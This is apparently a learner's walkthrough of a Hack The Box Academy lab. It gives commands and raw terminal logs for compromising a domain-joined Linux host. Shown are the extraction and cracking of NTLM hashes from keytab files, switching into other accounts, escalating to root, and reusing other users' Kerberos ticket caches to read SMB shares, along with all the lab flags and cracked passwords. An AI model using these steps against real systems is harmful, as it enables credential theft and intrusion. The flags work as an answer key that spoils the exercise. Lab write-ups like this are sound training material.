Operation Name: Card Rhino
Execution Time: 5h
Operation Name: Card Rhino
Execution Time: 5h
Commands per minute
Hacking commands
# Prepare the environment
export TARGET_IP=10.129.166.81 // [!code --]
export TARGET_IP=10.129.166.82 // [!code ++]
sudo vi /etc/hosts
# Add the following to hosts file
# 10.129.166.81 inlanefreight.htb
ssh -l david@inlanefreight inlanefreight.htb -p 2222 // [!code highlight]
# flag 1 / Gett1ng_Acc3$$_to_LINUX01
david@inlanefreight.htb@linux01:~$ cat flag.txt
# flag 2 / Linux Admins
david@inlanefreight.htb@linux01:~$ realm list
# flag 3 / carlos.keytab
david@inlanefreight.htb@linux01:/tmp$ find / -name *keytab* -ls 2>/dev/null
david@inlanefreight.htb@linux01:/tmp$ cat /opt/specialfiles/carlos.keytab
# flag 4 / C@rl0s_1$_H3r3
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
## use https://crackstation.net/ to crack the hash
## a738f92b3c08b424ec2d99589a9cce60 - Password5
su - carlos@inlanefreight.htb
cat flag.txt
# flag 5 / Mor3_4cce$$_m0r3_Pr1v$
crontab -l
cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
cat /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
## use https://crackstation.net/ to crack the hash
## 7247e8d4387e76996ff3f18a34316fdd - Password4
su - svc_workstations@inlanefreight.htb
cat flag.txt
# flag 6 / Ro0t_Pwn_K3yT4b
sudo su
cd /root
cat flag.txt
# flag 7 / JuL1()_SH@re_fl@g
# Get julio's ticket import the ticket and get the flag from smb
cp /tmp/krb5cc_647401106_HRJDux .
cp /tmp/krb5cc_647401106_R6VB5C .
export KRB5CCNAME=krb5cc_647401106_R6VB5C.HTB
smbclient //dc01/carlos -k -c ls
smbclient //dc01/carlos -k -c 'more flag.txt'
# flag 8 / Us1nG_KeyTab_Like_@_PRO
# use the linux01$ Kerberos ticket to read the flag found in \DC01linux01
cp /var/lib/sss/db/ccache_INLANEFREIGHT.HTB .
export KRB5CCNAME=ccache_INLANEFREIGHT.HTB
smbclient //dc01/linux01 -k -c ls
smbclient //dc01/linux01 -k -c 'more flag.txt'
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@inlanefreight inlanefreight.htb -p 2222
david@inlanefreight@inlanefreight.htb's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Apr 2024 09:46:21 PM UTC
System load: 0.0 Processes: 212
Usage of /: 26.3% of 13.70GB Users logged in: 0
Memory usage: 25% IPv4 address for ens160: 172.16.1.15
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
3 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Oct 25 13:23:44 2022 from 172.16.1.5
david@inlanefreight.htb@linux01:~$ pwd
/home/david@inlanefreight.htb
david@inlanefreight.htb@linux01:~$ ls
flag.txt
david@inlanefreight.htb@linux01:~$ cat flag.txt
Gett1ng_Acc3$$_to_LINUX01
david@inlanefreight.htb@linux01:~$ flock
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ sudo /etc/hosts
sudo: /etc/hosts: command not found
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ sudo vi /etc/hosts
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb 2222
ssh: connect to host inlanefreight.htb port 22: Connection refused
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb 22
ssh: connect to host inlanefreight.htb port 22: Connection refused
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
The authenticity of host '[inlanefreight.htb]:2222 ([10.129.129.207]:2222)' can't be established.
ECDSA key fingerprint is SHA256:3I77Le3AqCEUd+1LBAraYTRTF74wwJZJiYcnwfF5yAs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[inlanefreight.htb]:2222,[10.129.129.207]:2222' (ECDSA) to the list of known hosts.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
david@inlanefreight.htb: Permission denied (publickey,password).
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 22
ssh: connect to host inlanefreight.htb port 22: Connection refused
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb@ -p 2222
ssh: Could not resolve hostname : Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb@ -p 2222
ssh: Could not resolve hostname : Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb@ -p 22
ssh: Could not resolve hostname : Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
david@inlanefreight.htb: Permission denied (publickey,password).
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ export TARGET_IP=10.129.129.207
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ xfreerdp /v:$TARGET_IP /u:administrator /p:Password2 /cert-ignore
[22:35:16:282] [5392:5393] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-385803/.config/freerdp
[22:35:16:283] [5392:5393] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-385803/.config/freerdp/certs]
[22:35:16:283] [5392:5393] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-385803/.config/freerdp/server]
[22:35:16:984] [5392:5393] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[22:35:16:984] [5392:5393] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[22:35:16:984] [5392:5393] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[22:35:16:984] [5392:5393] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ xfreerdp /v:$TARGET_IP /u:david /p:Password2 /cert-ignore
[22:35:41:837] [5432:5433] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[22:35:41:837] [5432:5433] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:35:41:845] [5432:5433] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:35:41:846] [5432:5433] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:35:42:790] [5432:5433] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[22:38:25:158] [5432:5433] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[22:38:25:158] [5432:5433] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[22:38:25:158] [5432:5433] [INFO][com.freerdp.client.common] - Network disconnect!
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ export TARGET_IP=10.129.124.27
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ sudo vi /etc/hosts
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p 2222
Warning: Permanently added the ECDSA host key for IP address '[10.129.124.27]:2222' to the list of known hosts.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -pPassword2
Bad port 'Password2'
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh david@inlanefreight.htb -p2222 Password2
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ man ssh
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david -W inlanefreight.htb:2222
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
[-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
[-i identity_file] [-J [user@]host[:port]] [-L address]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-Q query_option] [-R address] [-S ctl_path] [-W host:port]
[-w local_tun[:remote_tun]] destination [command]
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david -w inlanefreight.htb:2222
Bad tun device 'inlanefreight.htb:2222'
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@ inlanefreight.htb:2222
ssh: Could not resolve hostname inlanefreight.htb:2222: Name or service not known
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@ inlanefreight.htb -p 2222
david@@inlanefreight.htb's password:
Permission denied, please try again.
david@@inlanefreight.htb's password:
Permission denied, please try again.
david@@inlanefreight.htb's password:
^C
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david inlanefreight.htb -p 2222
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
Permission denied, please try again.
david@inlanefreight.htb's password:
┌─[eu-academy-1]─[10.10.15.197]─[htb-ac-385803@htb-kn46gt8wmd]─[~]
└──╼ [★]$ ssh -l david@inlanefreight inlanefreight.htb -p 2222
david@inlanefreight@inlanefreight.htb's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Apr 2024 09:46:21 PM UTC
System load: 0.0 Processes: 212
Usage of /: 26.3% of 13.70GB Users logged in: 0
Memory usage: 25% IPv4 address for ens160: 172.16.1.15
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
3 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Oct 25 13:23:44 2022 from 172.16.1.5
david@inlanefreight.htb@linux01:~$ pwd
/home/david@inlanefreight.htb
david@inlanefreight.htb@linux01:~$ ls
flag.txt
david@inlanefreight.htb@linux01:~$ cat flag.txt
Gett1ng_Acc3$$_to_LINUX01
david@inlanefreight.htb@linux01:~$ realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
david@inlanefreight.htb@linux01:~$ cd /tmp
david@inlanefreight.htb@linux01:/tmp$ ls
krb5cc_647401106_HRJDux
krb5cc_647401106_nSvcfS
krb5cc_647401107_ukWPne
krb5cc_647402606
snap.lxd
systemd-private-9396ad9227124ab18d8e07117017ce86-ModemManager.service-VNjzAi
systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-logind.service-FwBDwh
systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-resolved.service-tzq3Hf
systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-timesyncd.service-q9f3Eg
vmware-root_696-2722173465
david@inlanefreight.htb@linux01:/tmp$ ls -la
total 68
drwxrwxrwt 13 root root 4096 Apr 15 21:46 .
drwxr-xr-x 20 root root 4096 Oct 6 2021 ..
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .ICE-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .Test-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .XIM-unix
drwxrwxrwt 2 root root 4096 Apr 15 21:39 .font-unix
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Apr 15 21:45 krb5cc_647401106_HRJDux
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1414 Apr 15 21:45 krb5cc_647401106_nSvcfS
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Apr 15 21:46 krb5cc_647401107_ukWPne
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 3175 Apr 15 21:47 krb5cc_647402606
drwx------ 3 root root 4096 Apr 15 21:39 snap.lxd
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-ModemManager.service-VNjzAi
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-logind.service-FwBDwh
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-resolved.service-tzq3Hf
drwx------ 3 root root 4096 Apr 15 21:39 systemd-private-9396ad9227124ab18d8e07117017ce86-systemd-timesyncd.service-q9f3Eg
drwx------ 2 root root 4096 Apr 15 21:39 vmware-root_696-2722173465
david@inlanefreight.htb@linux01:/tmp$ find / -name *keytab* -ls 2>/dev/null
287437 4 -rw-r--r-- 1 root root 2110 Aug 9 2021 /usr/lib/python3/dist-packages/samba/tests/dckeytab.py
288276 4 -rw-r--r-- 1 root root 1871 Oct 4 2022 /usr/lib/python3/dist-packages/samba/tests/__pycache__/dckeytab.cpython-38.pyc
287720 24 -rw-r--r-- 1 root root 22768 Jul 18 2022 /usr/lib/x86_64-linux-gnu/samba/ldb/update_keytab.so
286812 28 -rw-r--r-- 1 root root 26856 Jul 18 2022 /usr/lib/x86_64-linux-gnu/samba/libnet-keytab.so.0
131610 4 -rw------- 1 root root 1348 Oct 4 2022 /etc/krb5.keytab
262464 12 -rw-r--r-- 1 root root 10015 Oct 4 2022 /opt/impacket/impacket/krb5/keytab.py
262619 4 -rw-rw-rw- 1 root root 216 Apr 15 21:50 /opt/specialfiles/carlos.keytab
131201 8 -rw-r--r-- 1 root root 4582 Oct 6 2022 /opt/keytabextract.py
287958 4 drwx------ 2 sssd sssd 4096 Jun 21 2022 /var/lib/sss/keytabs
398204 4 -rw-r--r-- 1 root root 380 Oct 4 2022 /var/lib/gems/2.7.0/doc/gssapi-1.3.1/ri/GSSAPI/Simple/set_keytab-i.ri
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.
krb5.conf krb5.keytab
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.
krb5.conf krb5.keytab
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.
krb5.conf krb5.keytab
david@inlanefreight.htb@linux01:/tmp$ cat /etc/krb5.keytab
cat: /etc/krb5.keytab: Permission denied
david@inlanefreight.htb@linux01:/tmp$ cat /opt/specialfiles/carlos.keytab
>INLANEFREIGHT.HTBcarlosf� �8�+�$�-�X���NINLANEFREIGHT.HTBcarlosf� B�
�Xic��땐Y^��|H�%�*�i��)C>INLANEFREIGHT.HTBcarlosf� �tի�O�H]a�david@inlanefreight.htb@linux01:/tmp$ ls/opt/
-bash: ls/opt/: No such file or directory
david@inlanefreight.htb@linux01:/tmp$ ls /opt
impacket keytabextract.py linikatz.sh specialfiles
david@inlanefreight.htb@linux01:/tmp$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
su: Authentication failure
david@inlanefreight.htb@linux01:/tmp$ Password5
Password5: command not found
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ ls
flag.txt script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat flag.txt
C@rl0s_1$_H3r3
carlos@inlanefreight.htb@linux01:~$
linux01:/tmp$ ls/opt/
-bash: ls/opt/: No such file or directory
david@inlanefreight.htb@linux01:/tmp$ ls /opt
impacket keytabextract.py linikatz.sh specialfiles
david@inlanefreight.htb@linux01:/tmp$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
su: Authentication failure
david@inlanefreight.htb@linux01:/tmp$ Password5
Password5: command not found
david@inlanefreight.htb@linux01:/tmp$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
04/15/2024 21:56:23 04/16/2024 07:56:23 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 04/16/2024 21:56:23
carlos@inlanefreight.htb@linux01:~$ ls
flag.txt script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat flag.txt
C@rl0s_1$_H3r3
carlos@inlanefreight.htb@linux01:~$ cat script-test-results.txt
session setup failed: NT_STATUS_CONNECTION_RESET
carlos@inlanefreight.htb@linux01:~$ cat script-test-results.txt
session setup failed: NT_STATUS_CONNECTION_RESET
carlos@inlanefreight.htb@linux01:~$
carlos@inlanefreight.htb@linux01:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/svc_workstations.
cat: /home/carlos@inlanefreight.htb/.scripts/svc_workstations.: No such file or directory
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
XINLANEFREIGHT.HTBsvc_workstationsf�a
M *=T[�v#{7��V�B��wu=d(8��mcar
carlos@inlanefreight.htb@linux01:~$ python /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.
svc_workstations._all.kt svc_workstations.kt
carlos@inlanefreight.htb@linux01:~$ python /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.
svc_workstations._all.kt svc_workstations.kt
carlos@inlanefreight.htb@linux01:~$ python /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
Command 'python' not found, did you mean:
command 'python3' from deb python3
command 'python' from deb python-is-python3
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
[!] No RC4-HMAC located. Unable to extract NTLM hashes.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[!] Unable to identify any AES128-CTS-HMAC-SHA1 hashes.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
NTLM HASH : 7247e8d4387e76996ff3f18a34316fdd
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
AES-128 HASH : 3a7e52143531408f39101187acc80677
carlos@inlanefreight.htb@linux01:~$
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
NTLM HASH : 7247e8d4387e76996ff3f18a34316fdd
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
AES-128 HASH : 3a7e52143531408f39101187acc80677
carlos@inlanefreight.htb@linux01:~$ su - svc_workstations
su: user svc_workstations does not exist
carlos@inlanefreight.htb@linux01:~$ su - svc_workstation
su: user svc_workstation does not exist
carlos@inlanefreight.htb@linux01:~$ su - svc_workstation@inlanefreight.htb
su: user svc_workstation@inlanefreight.htb does not exist
carlos@inlanefreight.htb@linux01:~$ su - svc_workstations@inlanefreight.htb
Password:
svc_workstations@inlanefreight.htb@linux01:~$ ls
flag.txt
svc_workstations@inlanefreight.htb@linux01:~$ cat flag.txt
Mor3_4cce$$_m0r3_Pr1v$
svc_workstations@inlanefreight.htb@linux01:~$